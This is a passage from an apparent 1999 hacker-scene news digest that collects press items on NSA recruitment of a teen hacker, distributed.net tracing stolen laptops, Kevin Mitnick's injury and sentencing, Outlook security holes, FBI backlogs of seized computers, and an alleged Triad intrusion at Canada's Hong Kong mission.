The idea behind the story is to make a positive impact on the media and
public´s understanding of hackers. It is meant to "break the hacker
stereotype." As a CNN anchor said, you "may remember the movie
War Games. Now the government is remaking the image of hackers."

I will be interviewed by FOX News on Wednsday night to air on Labor
Day Weekend. The focus of the FOX story will be similiar -- with a
focus on breaking the hacker stereotype and emphasizing the positive
side of hackers. Likewise, I have been in discussions with an NBC
channel for a similiar story.

I´ve previously been quoted or pictured in magazines such as US News
& World Report and PC World on security subjects. The US News
article was likewise focused on changing the attitude about hackers.

Since the CNN story started running I´ve been swamped by hundreds
of e-mails from everyone from venture capitalists to former NSA
employees. All have been very supportive, and I thank them very
much.

Related Links:

OSAll BBSystem
http://www.aviary-mag.com/bbsystem

National Security Agency
http://www.nsa.gov

Cable News Network
http://www.cnn.com

CNN Transcript of Partial Segment
http://cnn.com/TRANSCRIPTS/9908/23/wt.06.html

FOX News Network
http://www.foxnews.com

NBC
http://www.nbc.com

US News & World Report
http://www.usnews.com

PC World Magazine
http://www.pcworld.com

Transcript:

World Today

Teenage Hacker Gets Attention of NSA

Aired August 23, 1999 - 10:51 p.m. ET

THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS
FINAL FORM AND MAY BE UPDATED.

JOIE CHEN, CNN ANCHOR: Perhaps you'll remember the movie "War
Games," which told the story of a cyberwhiz who was pursued by the
Pentagon and CIA because of his hacking activities. Now some parallels in
the life of a real-life teen now being targeted by a key security agency.

The details from CNN's Ann Kellan.

(BEGIN VIDEOTAPE)

ANN KELLAN, CNN CORRESPONDENT (voice-over): He's your
typical teenager -- hangs out with friends, loves pizza, argues with his
parents that he really is old enough to drive. So why would the government's
top-secret national security agency, the NSA, be interested in Mike Hudak?
This 16-year-old is a computer whiz kid, a hacker.

MIKE HUDAK III, COMPUTER HACKER: Most hackers are not
malicious. They're good people.

KELLAN: Mike was 12 when he bought his first computer and immediately,
and legally, hacked it.

HUDAK: One of the first things I did with it is I took it apart and then put it
back together. And I was praying, you know, and it worked.

KELLAN: He even set up his own hacker news Web site. The NSA
noticed it.

HUDAK: They visited my site every day, and I can tell from site logs. So I
e-mailed them, and they e-mailed me back, telling me about their recruitment
program.

KELLAN: The NSA wouldn't comment on camera, but off-camera says it
recruits students like Mike and will pay four years college tuition, room and
board, even pay a salary. In exchange, students work summers and at least
five years after college for the NSA.

HUDAK: Don't use all caps. Turn off caps lock.

KELLAN: It's tempting for someone like Mike, who babysits everyday after
school and during the summer to make a buck. But then he wonders if he
can work for the NSA when he disagrees with some its policies.

HUDAK: I would have to think long and hard before I did it.

KELLAN: Not your typical computer hacker stereotype.

HUDAK: This made it into the dictionary this year.

KELLAN: Mike's parents are proud of his accomplishments, but dad wants
mike to be a doctor.

MIKE HUDAK II, MIKE'S FATHER: I love what he's doing now, but I
think with his ability he could be a hell of a surgeon.

HUDAK: No, I've always -- the sight of blood has always made me weak
in the knees.

KELLAN: Mike, at 16, wants a career where fun and money go hand in
hand.

Ann Kellan, CNN, Fairfield, Connecticut.

(END VIDEOTAPE)

TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL
800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM
LOCATED AT www.fdch.com

-=-

http://cnn.com/TECH/computing/9908/26/t_t/teen.hacker/index.html

Federal agency recruits hacker
teens

August 26, 1999
Web posted at: 11:21 a.m. EDT (1521 GMT)

FAIRFIELD, Connecticut (CNN) -- What image comes to mind when you
hear the word hacker?

If it's someone evil or malicious, somebody breaking into computers
illegally, you're only partly right.

For instance, Mike Hudack is your typical teenager. He hangs out with
friends, loves pizza and argues with his parents that he really is old enough to
drive.

So why would the National Security Agency be interested in him? Because
this 16-year-old is a computer whiz, a hacker.

"Not every hacker, not everyone who calls themselves a hacker, is a bad
person," Mike says. "Most hackers are not malicious. They are good people."

Mike was 12 years old when he bought his first computer.

"And I took it home, and I loved it so much," Mike says. "One of the first
things I did with it is I took it apart and then put it back together."

He even set up his own hacker news Web site, offering security advice to
government agencies. That is how he got the NSA's attention.

"They visited my site every day and I e-mailed them, they e-mailed me back,
telling me about their recruitment program," Mike says.

The NSA says it recruits students like Mike and will pay four years of college
tuition, room and board and even a salary.

In exchange, students work summers and at least five years after college for
the NSA.

It's tempting for someone like Mike who baby-sits every day after school and
during the summer to make a buck.

But he wonders if he can work for the NSA, given that he disagrees with
some its policies.

"I would have to think long and hard before I did it," Mike says.


@HWA

27.0 Distributed.net Fingers Thief
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
On two separate occasions stolen laptops where
recovered with the help of the distributed.net RC5
client. The idiotic thieves did not reformat the hard
drives of the stolen systems like they should have and
instead started using them on the internet with the
original software installed. Distributed.net was then able
to match the original email address from the clients with
the machines new IP numbers to trace the thieves.

Wired
http://www.wired.com/news/news/technology/story/21431.html

Not everyone thinks this is a good thing. Some feel that
Distributed.net erred by giving out its web logs without
a warrant.

MindSec
http://www.mindsec.com/misc/distnet.html

Wired;

Net Address Helps Finger Felons
by Andy Patrizio

2:00 p.m. 25.Aug.99.PDT
Running the RC5 client on your computer is not only a nifty way to win a few thousand dollars,
it could also help find your PC if it is stolen.

The RC5 client is used in a contest where people put their PCs to work in an attempt to break
RSA Data Securities' 64-bit encryption.


On two occasions, computers running the RC5 client were stolen, but the crooks were caught because
they didn't realize that the computers could be traced.

RSA, a leading developer of data encryption, issued a US$10,000 challenge two years ago to break
its 64-bit encryption security.

There are 18 quintillion key possibilities with 64-bit encryption, and after two years and 197,000
participants, only 11.8 percent of the keys have been tested.

RC5 runs during idle CPU cycles. It periodically connects to Distributed.net servers to return
processed encryption keys and to retrieve new ones.

When the thieves started to use the computers, RC5 continued to process keys and connect to
Distributed.net servers, sending in completed work and fetching new keys. And when the stolen
computer communicated with the server, it logged in using the thief's IP address.

The Distributed.net administrators tracked down the IP address back to the thieves' ISPs, and in turn
were able to determine who was using that IP address when the keys were sent.

In separate incidents, in May 1998 in Sweden, and this year at Oregon State University in Corvallis,
Oregon, police were able to recover the computers, said David McNett, a programmer who runs Distributed.net.

"We have a joke in the admin channel that Distributed.net is like LoJack for your computer." LoJack is a
device placed in cars that allows police to determine their location if the vehicles are stolen.

"It's certainly an unanticipated side effect of running the client, but a good one."


The other side of the coin
Mindsec;

Wired News Article http://www.wired.com/news/news/technology/story/21431.html

Mindsec.com has noted that services like distributed.net, and Seti@home, that let you have a background
client running, which will periodically send in your finished blocks, or some data that they are processing,
as well as the IP you came from, and your email address. It sends the email address you provide to it for
statistics and tracking purposes. When that is done, binded to your IP address, it effectively lets them see
where you are coming from.

Well that is not a problem, that is fine. Except when two things happen, the first would be when
distributed.net, without being served a warrant, just gives logs to a regular person, who wants them. It is
great that the person got their stolen computer back, and the person who stole it was arrested, however it
should have gone through legal channels, and they should have been served a warrant. The second, what if they
are served a warrant to track someone? Well, there is nothing you can do about that, except to use a fake email
address, or an account that you never access from anywhere else, and use a proxy server to connect to them. If
you just use a fake email account, and use it ONLY with distributed.net, you would be OK, since there is no
way someone would know what that account is. However if someone found it, poof, you have been tracked.

These are things you should keep in mind, they are important and serious. They are a big part in computer
privacy, and Mindsec.com fully support Computer Privacy, and Privacy in general.

When we spoke to the administrative contact at distributed.net, he said that they gave out the logs just to
help them out. he also stated "The logs are no different than any web server that logs your IP". I corrected
him in the fact that web servers do not cross reference to a database of email addresses. I am sure they meant
no harm, and I hope they will realize that this is bad and never do it again. They were contacted by the people
who had their computers stolen, and they did the research for them. It is unclear if it was distributed.net who
spoke to the ISP of the thief, or if it was turned over the the police first.

Late Addition: Just to clarify to the people who are mailing and saying that they don't see the problem. Go
sign up to be on distributed.net. What authentication does it do to find out who you are? None, so how can
someone go after the fact and try to say "Well that is me". I am sure I could say "I am Joe Johnson, my laptop
got stolen, this is my email address, could you give me the logs?". If distributed.net even asked for any kind of
verification of who they were, besides their email address, and sending email to the same account that the rc5
client was using, how is that secure verification? If "Hacker X" wanted to track down "Hacker B", they hack that
persons account, and if that was already enough to track them, they could find them in almost real time, to their
IP address, thanks to distributed.net. I like the idea behind distributed computing, most people like the idea.
But the way it logs and such are serious, it either needs real verification, via pgp of some sort.. I would say
they need to just not give out their logs without a warrant, but nobody can trust them after this.



@HWA

28.0 Hacktivism Email List
~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by grugnog
An email list to discuss news about recent hactivists
events and analysis about hacktivism and for discussion
possibly leading to a better understanding of what
'hacktivism' means (as a word and in a tactical, ethical
and practical sense).

Hacktivism list
http://www.tao.ca/~grugnog/hacktivism/

@HWA

29.0 Mitnick in Car Accident
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by maverick212
While being transported from the San Bernardino Jail to
the Los Angeles Metropolitan Detention Center the
vehicle Kevin Mitnick was riding in was involved in a
multi car pile up. The accident occurred on Highway 60
between 8:30 and 9 a.m.. Kevin was thrown against a
metal divider within the vehicle and suffered minor head
and neck injuries. Although Kevin and the other
prisoners were shackled in chains no seat bealts were
used. After the accident Kevin was transported back to
the San Bernardino Jail.

FREE KEVIN
http://www.freekevin.com/

Wired
http://www.wired.com/news/news/politics/story/21455.html

Mitnick Hurt in Car Crash
by Douglas Thomas

4:30 p.m. 26.Aug.99.PDT
LOS ANGELES -- Convicted hacker Kevin Mitnick sustained minor head and neck injuries Wednesday morning in a multi-car accident while he was
being transferred to a facility that satisfied his dietary requirements.

Mitnick, being transferred in anticipation of a court ruling which would order Mitnick moved to a facility that served kosher meals, was thrown
against a metal divider.


See also: Life Not Kosher for Mitnick


Mitnick and an unknown number of other inmates -- shackled in chains but with no safety restraining devices -- were being transported from the
San Bernardino Jail to the Los Angeles Metropolitan Detention Center. The crash occurred on Highway 60 between 8:30 and 9 a.m.

"I really slammed my head when I hit the metal divider," Mitnick said in a telephone interview on Thursday.

X-rays proved negative, although Mitnick continues to complain of headaches, nausea, and shoulder and neck pain.

Insult soon added to his injuries: After spending several hours waiting to be admitted to the MDC, Mitnick was transferred back to the San
Bernardino facility, which does not serve kosher food.

Mitnick wound up spending most of Wednesday night waiting on the floor of a holding cell to be readmitted. He was finally booked into the facility
at 3:30 a.m. Thursday.

Mitnick said he has yet to be seen by a San Bernardino facility nurse, and has had no access to any painkiller, including Tylenol. "I don't think they
have any idea what happened," Mitnick said, referring to the lack of medical attention.

Although unwilling to comment on legal action regarding the accident, Mitnick's attorneys did say that they immediately sent a letter to the U.S.
Marshals Service requesting that Mitnick be moved to a federal facility. They say a federal facility could provide him access to kosher food and to
medical treatments in keeping with federal guidelines.

U.S. Marshals were unavailable for comment.

"This has definitely been one of the worst days in custody," Mitnick said.

(If that was his worst day he's been doing alright, noone has made him their girlfriend yet ... - Ed)

@HWA


30.0 Hong Kong Police Create Computer Crime Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
The Hong Police have announced plans to form the
Computer Crime Investigation Cadre to help tackle
computer crime at district levels. Members of the squad
will be selected from officer training course being run by
the Commercial Crime Bureau.

South China Morning Post
http://www.technologypost.com/enterprise/Daily/19990826112510135.asp?Section=Main

Published on Thursday, August 26, 1999

ENTERPRISE

HK police to establish
computer crime team

NEWSBYTES

The Hong Kong police yesterday announced plans to
form a special team of officers with expert knowledge in
the area of computer crime to help battle criminals that
are increasingly turning to electronic means to commit
crimes.

The new squad will consist of an unspecified number of
officers who will be called in to help colleagues when
criminals employ sophisticated computer techniques in
committing their crimes.

"The surge in computer use, the increase of related
criminal cases and other emerging issues in various
regions over the past year have resulted in a challenge
which the 17 members of the section now find it difficult
to cope with, without resorting to help from their Force
colleagues," explained Commercial Crime Bureau Chief
Superintendent, Victor Lo Yik-kee.

"That is what Cadre members will be for," added Mr
Lo. "Once qualified and recognised, they can help
provide support services to their own formations in
handling cases of computer-related crimes while officers
of the Section can continue to play the role of a
co-ordinator and provide assistance when needed."

The first members of the squad are expected to be
recruited by September. The Commercial Crime Bureau
is already running a training course for officers from
across the course, said the force, and this course is
being used to select members of the new Computer
Crime Investigation Cadre which will help tackle
computer crime at District levels.

The training course follows a similar two day meeting at
the Police Training School in July when over 180
officers of different ranks and members of the
Immigration Department and the Customs and Excise
Department attended seminars on computer crime and
undertook a written test to judge their knowledge of the
subject.

Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.

@HWA


31.0 Outlook Holes Demonstrated at USENIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Richard Smith, president of Phar Lap Software, recently
gave a presentation at the 8th Usenix Security
Symposium detailing over a dozen major holes in
Windows Outlook. Some holes would give infocriminals
complete access to your desktop computer.

Wired
http://www.wired.com/news/print_version/business/story/21442.html?wnpg=all

Locking Windows' Backdoors
by Declan McCullagh

3:00 a.m. 26.Aug.99.PDT
WASHINGTON, DC -- If you use Microsoft Outlook, be warned. Over a dozen bugs in Windows 98 let malicious virus writers and meddlesome peeping
Toms view or erase any file on your hard drive.

At a computer security conference Wednesday afternoon, an expert demonstrated how malcontents can send apparently innocuous email with
hidden commands that -- if opened using certain email programs -- will give an intruder complete access to a Windows computer.


See also: Same Hole, Different Exploit


"We've got some serious problems here, folks. We've got some really bad backdoors on the computers we have on our desktops," said Richard
Smith, president of Cambridge, Massachusetts-based Phar Lap Software, who identified the person accused of writing the Melissa virus.

During his presentation at the 8th Usenix Security Symposium, Smith demonstrated some new security flaws he and his collaborators have identified
in their spare time. One recently unearthed and not-yet-fixed Win98 glitch lets an email opened in Outlook execute any DOS command -- including
reformatting your hard drive or uploading its contents to a remote Web site.

The solution? Consumers could switch to a non-Microsoft operating system. Another option, Smith suggested, is for customers to begin asking
computer companies to turn off features that let email messages execute other programs.

"It's prudent to avoid systems in which we can have executable content," said Peter Neumann, the conference's keynote speaker and a researcher
at SRI International. "There is no way you can have any assurance whatsoever that it will work."

Many of the problems security experts have identified stem from the design choices Microsoft made when developing Windows 95 and 98, which are
much more vulnerable to intrusions than Linux, Unix, or even Macintosh systems.

One gaping security hole is Microsoft's complicated ActiveX technology, which lets remote Web pages or email messages execute programs that
manufacturers claim are trustworthy. But sometimes they're not. With a little programming, a nefarious person can send email or create a Web page
that activates Active X functions that delete files, modify them, or even send their contents to any address on the Internet.

As security experts have identified these flaws, Microsoft has tried to fix them, and Smith said some have been eliminated from early versions of
Windows 2000. But the millions of people using current versions of Windows 98 and Outlook are still at risk, he said, unless they switch off ActiveX.

Not only Microsoft is to blame. Netscape has acknowledged security glitches in its browser. Unrepaired versions of Qualcomm's Eudora 4 let
executable programs masquerade as links.

Computer makers, too, have been shipping buggy software. Hewlett Packard has included two ActiveX controls on about 5 million Pavilion
computers, Smith said, that let HTML email messages opened in Outlook or Eudora take control of the computer. An intruder can silently insert a
virus, disable security features, view documents, or crash the system.

Some Compaq Presario computers suffer from a similar security risk. As configured from the factory, the computers trust all applications provided by
Compaq -- one of which can execute whatever program an email message orders it to run.

"Compaq gave every hacker in the world a way to run programs," Smith said.

To improve the security of Outlook, go to the Security tab in the program's Options dialog box and select "restricted sites zone." Then, in the
Internet Options Windows control panel, go to "Restricted sites/Custom level" and scroll down and disable "Active Scripting."

@HWA

32.0 Feds Overflowing with Siezed Equipment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by netmask
Hundreds of computer systems are piling up and cases
are going untried because the FBI lacks the resources
to examine confiscated equipment. Under federal law
investigators may keep property seized as possible
evidence until the statute of limitation for the given
crime expires, generally five years for computer crime
cases.

New York Times- Registration Required
http://www.nytimes.com/library/tech/99/08/cyber/cyberlaw/27law.html

Investigators Face a Glut of Confiscated
Computers

By MATT RICHTEL

hen the FBI raided the family home of Paul Maidman, 18, in late
May, they seized his computer as possible evidence of online
criminal activity and took it to a high-tech forensics lab in Dallas. The
Waldwick, N.J., teenager, who has yet to be arrested or charged with a
crime, is concerned that it could take a long time to learn his fate -- and
that of his computer.

The FBI and prosecutors on cases
like Maidman's say he could be
waiting a while. Maidman is one of
hundreds of people whose computers
are in federal and state custody. Law
enforcement officials say they lack the
time, resources and sometimes
expertise to examine all of the PCs
that are piling up.

For example, at the headquarters of a federal cybercrime task force in
Dallas, more than 100 hard drives await examination, but only three
forensics experts are available to look at them, said Paul E. Coggins, the
United States Attorney in Dallas. The computers were seized in cases
involving a range of alleged crimes, including fraud, embezzlement, child
pornography and computer break-ins.

"We've had hackers who are ready to plead guilty, but we're slowed
down because we lack the resources" to scour through the evidence,
Coggins said, adding that few forensics agents have been trained to find
and understand incriminating data on hard drives. "It's hard to find people
to begin with who not only have the interest but the competence," he
said.

It is unclear how widespread this problem is among state and federal
agencies. But Coggins said that numerous agencies, both state and
federal, seek the advice and assistance of the three forensics investigators
in Dallas, suggesting there is insufficient expertise in many jurisdictions.

"We are desperate for resources to process these cases," said Matthew
E. Yarbrough, an assistant United States Attorney based in Dallas who is
one of 25 federal prosecutors assigned by Congress to pursue
cybercrime cases full-time.

Supporters of hackers and the hacker ethos, which champions
non-malicious computer tinkering, say the situation is worrisome. They
fear that computer users who are innocent, or who may never be charged
with a crime, may be deprived of thousands of dollars worth of
equipment far longer than necessary.

As evidence, they point to a recent study by a
senior fellow at the Electronic Privacy
Information Center which found the prosecution
rate for computer crime to be lower than that
for other types of crime. That suggests to critics
that investigators are unfairly targeting innocent
people. Federal law enforcement officials counter that, in part because of
the complexity of evidence gathering, the computer crimes are
complicated to prosecute.

When it comes to holding confiscated property, the investigators have the
law on their side. Under federal law, they may keep property seized as
possible evidence until the statute of limitation for the given crime expires
-- with non-capital offenses, generally five years after the crime is
committed. Defense lawyers concede it is not unusual for law
enforcement to keep property as possible evidence in an ongoing
investigation for several years.

"It's not abnormal, but it is a big deal for the innocent person whose
expensive equipment is taken from them," said Jennifer S. Granick, a San
Francisco lawyer who represents hackers.

"Whether the seizure of the property is justified, we can't know now," she
said. "But in time, when the affidavits are unsealed, then we'll know
whether there was good cause or sound reason to deprive these people,
or whether the seizures are part of anti-hacker hysteria."

The issue dates back to a debate in 1990 over a government
investigation called "Operation Sun Devil," targeting members of the
Legion of Doom, a hacker group. As part of the investigation, agents
confiscated computers at Steve Jackson Games, a small company in
Austin, Tex., in search of a rule book for a game. Investigators thought
the book might be a how-to guide for computer criminals.

Without his computers, Jackson was nearly forced out of business. He
took the Secret Service to court and won on two of three counts, forcing
the Secret Service to pay more than $300,000 in damages and legal fees.

Today, federal investigators say they make an effort to return computers
to a business whose equipment may have been used by an employee
without its knowledge, or machines that are needed to keep a legitimate
business in operation. One way investigators accomplish this is by taking
a snapshot of the hard drive, copying all of the data and then returning the
original to its owner.

But Yarbrough, the assistant United States Attorney, said returning
personal computers to people suspected of wrongdoing is another
matter. He said their computers may be instruments used in a crime, and
would not be returned any more than a gun would in a similar situation.

Yarbrough said that it is not a valid use of limited government resources
to spend time copying the hard drives of a suspect's computer just to be
able to return it to them. "We don't give the gun back to a bad guy, and
we don't give the computer back to a bad guy," he said.

But Ms. Granick disagreed, arguing that while it is necessary to hold a
gun as evidence, hard drives are different. "You can't copy the gun and
have it be good evidence in court. You need to have the actual gun," she
said.

Hackers and others are allowed under federal law to
petition the government to return their property. But
some say they worry that if they do so, they risk
irritating investigators and making things harder on
themselves. "I don't want to make any problems," said
Maidman, the 18-year-old from New Jersey. "I'd
really like my stuff back, but I don't want to upset
them."

Maidman's home was raided in June during a broad sweep by federal
agents against computer criminals and phone "phreakers" -- people who
hijack time and resources from phone companies. At the time, Coggins's
office issued 16 warrants in 12 jurisdictions; the FBI said at the time that
the investigation targeted the theft of passwords and credit cards, among
other possible charges.

Coggins said the investigation is ongoing. But he said the government also
has to set priorities, and that with limited resources, the hacking cases
sometimes take a back seat to economic espionage or other major
crimes that require high-tech forensics research.

The federal government is not alone in its frustration. State governments
say they too are toiling under limited resources and expertise in dealing
with computer-based evidence. Kevin Higgins, chief Deputy Attorney
General for the state of Nevada, said that the spread of computers
among more ordinary criminals is making matters worse; even
methamphetamine dealers carry electronic organizers with the names of
their associates, he said.

"These days there's a debate over whether even to seize computers," he
said. "You've pretty much got to have a room just to store them in."

Carl S. Kaplan is on vacation.

@HWA


33.0 Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.epic.org/staff/banisar/hacker.html

Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions

By David Banisar, Contributing Editor
Criminal Justice Weekly,

Notorious computer hacker Kevin Mitnick, once described as "Cyberspace’s Most Wanted," is scheduled to be sentenced this month in U.S. District Court (C.D.
Cal) to 46 months in prison after pleading guilty to computer fraud and abuse in April 1999 for breaking into dozens of computers around the United States. The
sentencing will end a five-year, highly publicized chase and prosecution of the best-known hacker in the country. It raises many questions about the ability of law
enforcement to handle cases involving new technologies and the prosecutions of those accused of computer crimes.

Cyberspace’s Most Wanted?

The case has been the subject of worldwide media attention, which Mitnick’s supporters say has blown his exploits out of proportion. The New York Times led the
coverage, describing him in a 1994 front-page story as "Cyberspace’s Most Wanted." The Times stories increased interest in the case, and Mitnick was tracked
down and arrested in North Carolina in 1995. He was charged with 25 counts of computer fraud, wire fraud, and wiretapping, but none of these alleged crimes
were mentioned in the Times series. In previous prosecutions, Mitnick’s relationship with computers has been described by mental health experts as "obsessive." In
the current federal prosecution and a pending state case in California, he has not been accused of using computers for personal gain.

Prosecutors apparently decided to use his case as a warning to others. Since his arrest, he has been held without bail and repeated requests for a bail reduction
hearing have been denied. Prosecutors refused to give him access to a computer with the eight gigabytes of evidence they planned to use against him, claiming that he
could use it to break into more systems, even without a phone line and modem. He was once put into solitary confinement when prosecutors claimed that he was
converting an AM/FM radio into a transmitter.

Mitnick pleaded guilty to five felony charges following over four years of pretrial detention. He is now eligible for release to a halfway house, having already served
most of his time. The probation office has recommended that unsupervised use of computers, modems, or cellular phones be prohibited as a condition of supervised
release.

Mitnick still faces a California state charge of computer fraud for telephoning the California DMV in 1992 to persuade an employee there to fax him the driver’s
license information of a suspected informant. According to Carolyn Hagin, an attorney at the law offices of famed hippie lawyer Tony Serra, the attorney who is
representing Mitnick in state court, an attempt to lower bail from $1 million was denied by a Los Angeles Superior Court judge on July 9, who admitted that media
portrayals of Mitnick convinced him to deny bail. Meanwhile, John Markoff, the New York Times reporter whose gripping front-page stories made Mitnick a
celebrity, landed a book contract one week after Mitnick’s capture worth a reported $750,000. Takedown, a movie starring Tom Berringer, is scheduled to be
released later this year.

The Long Arm of the Law

The primary federal statute regarding computer crime is the Computer Fraud and Abuse Act (18 USC § 1030). The Act, originally adopted in 1984 and
substantially amended in 1986 and 1990, prohibits the unauthorized access or exceeding of the user’s permitted access to computers run by government agencies,
financial institutions, or computers used in interstate or foreign commerce, such as those connected to the Internet. It also prohibits releasing viruses or other
programs that can secretly access computers and cause damage.

The penalties for a first offense range from one year for accessing computers without intending to cause damage and without financial gain, to five years for
intentionally damaging computers or stealing information for material gain. A maximum of ten years can be imposed for using the access to obtain information
protected "for reasons of national defense or foreign relations."

There are several other statutes included in the U.S. Department of Justice Computer Crime Program category: those involving trafficking in access devices such as
passwords, cell phone cloning devices, or credit card numbers (18 U.S.C. § 1029), and mail and wire fraud (18 U.S.C. § 1343). Every state also has its own
computer statute.

Referrals Increasing, Most Cases Rejected

Federal agency referrals for prosecution of computer crimes have increased substantially over the past several years, but actual prosecutions are fairly rare.
According to U.S. Justice Department data obtained under the Freedom of Information Act by the Transactional Records Access Clearinghouse (TRAC) of
Syracuse University, the DOJ prosecuted 83 cases out of 417 referred in 1998 under the Computer Fraud program category.

Referrals have more than tripled since 1992 and 1993. Each year between 1992 and 1998, the DOJ has declined to prosecute between 64 and 78 percent of these
cases. Forty percent of the cases were declined because of lack of evidence of criminal intent, weak or insufficient admissible evidence, or no apparent violation of
federal law.

In 1998, 47 persons were convicted of computer crimes and 10 were found not guilty. Twenty were sentenced to prison. That year, the average sentence for those
convicted was five months, and over half received no jail time. Since 1992, 196 persons have been convicted and 84 persons have been sentenced to prison for
computer crimes.

Average sentences imposed for federal computer fraud and abuse violations have ranged from four to 18 months. In most years, over half of those convicted served
actual time behind bars. The longest sentence was against profit-oriented hacker Kevin Poulsen, who was sentenced in 1995 to 71 months for manipulating the
phone system to win radio contests. Like Mitnick, he was held without bail for five years. In his case, the prosecution initially charged him with obtaining classified
information as a justification for denying bail and then dropped the charge before trial.

Currently, there is no federal sentencing guideline specifically applicable to the Computer Fraud and Abuse Act (18 U.S.C. §§ 1029-1030). In 1993, the U.S.
Sentencing Commission’s Computer Fraud Working Group examined the application of existing federal sentencing guidelines as applied to the statute. The working
group found that for most cases, the fraud guideline, Section 2F1.1, adequately addressed most offenses. It recommended against creating a new guideline for
computer fraud because of the difficulty in measuring harm, the possibility of charging decisions that could lead to the same actions being prosecuted differently, and
the lack of empirical support (case law) for creating a separate guideline. The working group is presently drafting guidelines on losses for software piracy as required
by Congress under the No Electronic Theft (NET) Act (PL 105-147, 1997).

The FBI claims that there were nearly $400 million in losses between 1996 and 1998 due to computer fraud, but these numbers are difficult to verify. Mark Rasch, a
former federal prosecutor and now senior vice-president of Global Integrity Corp., a Virginia computer security consulting firm, notes that the issue of damages in
these types of cases "drives the sentencing guidelines" and are "tremendously fact specific."

In many cases, the numbers appear to be grossly inflated. In 1990, the federal government brought a case against Craig Neidorf, the publisher of Phrack magazine,
an underground online newsletter, for publishing the "source code" to BellSouth’s emergency 911 system. Prosecutors claimed that with the code, which they valued
at $57,000, hackers could shutdown the 911 system in the United States. Three days into the trial, Neidorf’s attorneys showed that the document was actually a
memo on procedures available for sale from BellSouth’s own catalog for $13, and the case was dropped. BellSouth had included in its figures the cost of the
workstation used to write the memo and the salary of the author.

In Mitnick’s case, the companies whose computers he broke into, including Sun Microsystems and Nokia, claim that he caused nearly $300 million in damages by
accessing their systems and stealing software. Several of the companies listed the entire cost for developing the software, rather than actual losses. Recently, Sun
Microsystems, which claimed Mitnick stole source code worth $80 million, recently began selling the same code to students and software developers for $100. Phil
Karn, a senior engineer at Qualcomm Inc., a San Diego-based cellular phone manufacturer, whose offices were broken into by Mitnick, told the Los Angeles Times
that "the real damage was loss of productivity and hassles . . . I don’t want to condone what Mitnick did, but he’s really not public enemy No. 1." Assistant U.S.
Attorney David Schindler is demanding Mitnick pay $1.5 million in restitution. His sentencing hearing has been put off several times while this issue is being
negotiated, but supporters say that without access to computers, Mitnick is unlikely to ever be able to earn enough money to pay restitution, no matter what the
amount.

A Cyberspace War or a New Red Scare?

While Mitnick cooled his heels awaiting trial, a new public fear of computers, and the potential impact of computer hackers on individual lives and national security
has emerged. In 1998, President Clinton signed Executive Order PDD 63, Critical Infrastructure Protection. Following the Executive Order, a number of
government agencies including the FBI, DOJ, and the National Security Agency (NSA), pressed for limits on security programs that include encryption, which can
protect communications from interception, and new powers to access telecommunications providers, such as telephone companies to protect them from
cyberattacks.

The New York Times reported on July 28 that the National Security Council has proposed a Federal Intrusion Detection Network (Fidnet) that would monitor
traffic on the Internet to look for patterns of computer intrusions. Data on the traffic would be stored at the National Infrastructure Protection Center, an interagency
task force run by the FBI.

Thomas Guidoboni of Michaels, Wishmer and Bonner, Washington, D.C., who has represented several persons accused of computer crimes, says there is a
paranoia about hackers. "Everyone is frightened of what they can do. . . . It scares people to think their computers can be broken into."

The NSC proposal, which could have profound privacy and civil liberties implications, has been criticized both inside and outside the government and is unlikely to
be adopted. But the combination of the growth of the Internet, fear, and bureaucratic demands for more power to protect systems ensure that there will be more
prosecutions in the coming years.

David Banisar is a Washington, DC, area attorney specializing in computer and communications law. He is the co-author of The Electronic Privacy
Papers (John Wiley and Sons, 1997) and a Senior Fellow at the Electronic Privacy Information Center. He is a contributing editor to Criminal Justice
Weekly.



Editor’s note:

Since the publication of this article, Mitnick was sentenced to 46 months in jail and ordered to pay $4,100 in restitution. The pending case against him in the state of
California was also dropped.

@HWA

34.0 Triads Linked to Info Vandalism - Alleged CoverUp by RCMP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hex_Edit
Classified documents from the Royal Canadian Mounted
Police allege that Chinese nationals with links the Triads,
(Chinese Mafia) have broken into the computer system
at Canadian High Commission in Hong Kong. The
Computer Assisted Immigration Processing System is
supposed to have had over 788 files deleted. The
intrusions may have taken place as long as seven years
ago. It is believed that the RCMP is covering up the
events.

National Post
http://www.nationalpost.com/home.asp?f=990826/63514

Vancouver Province
http:/

  
/www.vancouverprovince.com/newsite/news/990826/2775271.html

National Post;

Triads linked to hacking at
Canadian mission
Files deleted, blank visa forms missing in
Hong Kong

Fabian Dawson
The Province

VANCOUVER - Chinese nationals linked to organized crime
have broken into the immigration computer at the Canadian High
Commission in Hong Kong, classified documents allege.

At least 788 files from the Computer Assisted Immigration
Processing System (CAIPS) were deleted, and up to 2,000 blank
visa forms have disappeared, according to the documents.

The core allegation is that certain people paid locally engaged high
commission staff to delete their backgrounds in the computer
system to hide their links with Triads -- the Chinese Mafia.

A related concern is that the stolen visa forms have been used by
possibly hundreds of people, including criminals, to enter Canada
illegally.

For seven years, the RCMP, Immigration Canada and the
Department of External Affairs are alleged to have kept a lid on
the case, which several sources call a ''breach of national
security.''

Two key figures in the investigation suspect the RCMP is covering
up criminal acts and negligence at Canada's immigration office in
Hong Kong.

Details of the case are contained in reports filed by Robert Read,
an RCMP corporal in Ottawa, and Brian McAdam, a former
immigration control officer at the high commission in Hong Kong.

''I believe there has been a massive conspiracy to cover up the
